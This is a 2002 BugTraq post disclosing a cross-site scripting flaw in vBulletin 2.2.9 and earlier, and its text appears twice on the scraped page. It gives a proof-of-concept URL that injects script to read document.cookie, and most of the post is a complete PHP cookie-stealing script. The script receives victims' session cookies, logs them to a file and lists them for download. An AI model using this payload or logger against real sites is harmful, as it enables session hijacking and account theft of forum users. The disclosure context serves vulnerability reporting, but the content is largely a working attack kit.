BugTraq
Back to list
|
Post reply
XSS bug in vBulletin
Nov 21 2002 08:34PM
Arab VieruZ (arabviersus hotmail com)
Vulnerable systems:
* Jelsoft vBulletin 2.2.9 and prior
Exploit:
http://www.vbulletin.com/forum/memberlist.php?
s=23c37cf1af5d2ad05f49361b0407ad9e&what=">"<Scr*ipt>javascript:alert
(document.cookie)</Scr*ipt>
you can use this code (thanx for SP.IC):
<?PHP
// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC (SpeedICNet (at) Hotmail (dot) Com [email concealed]).
// Descrption: Fetching vBulletin's cookies and storing it into a
log file.
// Variables:
$LogFile = "Cookies.Log";
// Functions:
/*
If ($HTTP_GET_VARS['Action'] = "Log") {
$Header = "<!--";
$Footer = "--->";
}
Else {
$Header = "";
$Footer = "";
}
Print ($Header);
*/
Print ("<Title>vBulletin XSS Injection Vulnerability:
Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet (at) Hotmail (dot) Com [email concealed]\">Sp.IC</A></B><Hr Width=\"20%\">");
/*
Print ($Footer);
*/
Switch ($HTTP_GET_VARS['Action']) {
Case "Log":
$Data = $HTTP_GET_VARS['Cookie'];
$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen
(DecHex (MD5 (NULL))))));
$Log = FOpen ($LogFile, "a+");
FWrite ($Log, Trim ($Data) . "\n");
FClose ($Log);
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0;
URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
Case "List":
If (!File_Exists ($LogFile) || !In_Array ($Records)) {
Print ("<Br><Br><B>There are No
Records</B></Center></Pre>");
Exit ();
}
Else {
Print ("</Center></Pre>");
$Records = Array_UniQue (File ($LogFile));
Print ("<Pre>");
Print ("<B>.:: Statics</B>\n");
Print ("\n");
Print ("o Logged Records : <B>" . Count
(File ($LogFile)) . "</B>\n");
Print ("o Listed Records : <B>" . Count
($Records) . " </B>[Not Counting Duplicates]\n");
Print ("\n");
Print ("<B>.:: Options</B>\n");
Print ("\n");
If (Count (File ($LogFile)) > 0) {
$Link['Download'] = "[<A Href=\"" .
$LogFile . "\">Download</A>]";
}
Else{
$Link['Download'] = "[No Records in Log]";
}
Print ("o Download Log : " . $Link
['Download'] . "\n");
Print ("o Clear Records : [<A Href=\"" .
$SCRIPT_PATH. "?Action=Delete\">Y</A>]\n");
Print ("\n");
Print ("<B>.:: Records</B>\n");
Print ("\n");
While (List ($Line[0], $Line[1]) = Each ($Records)) {
Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
}
}
Print ("</Pre>");
Break;
Case "Delete":
@UnLink ($LogFile);
Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>")
Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
$HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
}
?>
-----------------
Arab VieruZ
thanX
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Vulnerable systems:
* Jelsoft vBulletin 2.2.9 and prior
Exploit:
http://www.vbulletin.com/forum/memberlist.php?
s=23c37cf1af5d2ad05f49361b0407ad9e&what=">"<Scr*ipt>javascript:alert
(document.cookie)</Scr*ipt>
you can use this code (thanx for SP.IC):
<?PHP
// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC (SpeedICNet (at) Hotmail (dot) Com [email concealed]).
// Descrption: Fetching vBulletin's cookies and storing it into a
log file.
// Variables:
$LogFile = "Cookies.Log";
// Functions:
/*
If ($HTTP_GET_VARS['Action'] = "Log") {
$Header = "<!--";
$Footer = "--->";
}
Else {
$Header = "";
$Footer = "";
}
Print ($Header);
*/
Print ("<Title>vBulletin XSS Injection Vulnerability:
Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet (at) Hotmail (dot) Com [email concealed]\">Sp.IC</A></B><Hr Width=\"20%\">");
/*
Print ($Footer);
*/
Switch ($HTTP_GET_VARS['Action']) {
Case "Log":
$Data = $HTTP_GET_VARS['Cookie'];
$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen
(DecHex (MD5 (NULL))))));
$Log = FOpen ($LogFile, "a+");
FWrite ($Log, Trim ($Data) . "\n");
FClose ($Log);
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0;
URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
Case "List":
If (!File_Exists ($LogFile) || !In_Array ($Records)) {
Print ("<Br><Br><B>There are No
Records</B></Center></Pre>");
Exit ();
}
Else {
Print ("</Center></Pre>");
$Records = Array_UniQue (File ($LogFile));
Print ("<Pre>");
Print ("<B>.:: Statics</B>\n");
Print ("\n");
Print ("o Logged Records : <B>" . Count
(File ($LogFile)) . "</B>\n");
Print ("o Listed Records : <B>" . Count
($Records) . " </B>[Not Counting Duplicates]\n");
Print ("\n");
Print ("<B>.:: Options</B>\n");
Print ("\n");
If (Count (File ($LogFile)) > 0) {
$Link['Download'] = "[<A Href=\"" .
$LogFile . "\">Download</A>]";
}
Else{
$Link['Download'] = "[No Records in Log]";
}
Print ("o Download Log : " . $Link
['Download'] . "\n");
Print ("o Clear Records : [<A Href=\"" .
$SCRIPT_PATH. "?Action=Delete\">Y</A>]\n");
Print ("\n");
Print ("<B>.:: Records</B>\n");
Print ("\n");
While (List ($Line[0], $Line[1]) = Each ($Records)) {
Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
}
}
Print ("</Pre>");
Break;
Case "Delete":
@UnLink ($LogFile);
Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>")
Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
$HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
}
?>
-----------------
Arab VieruZ
thanX
[ reply ]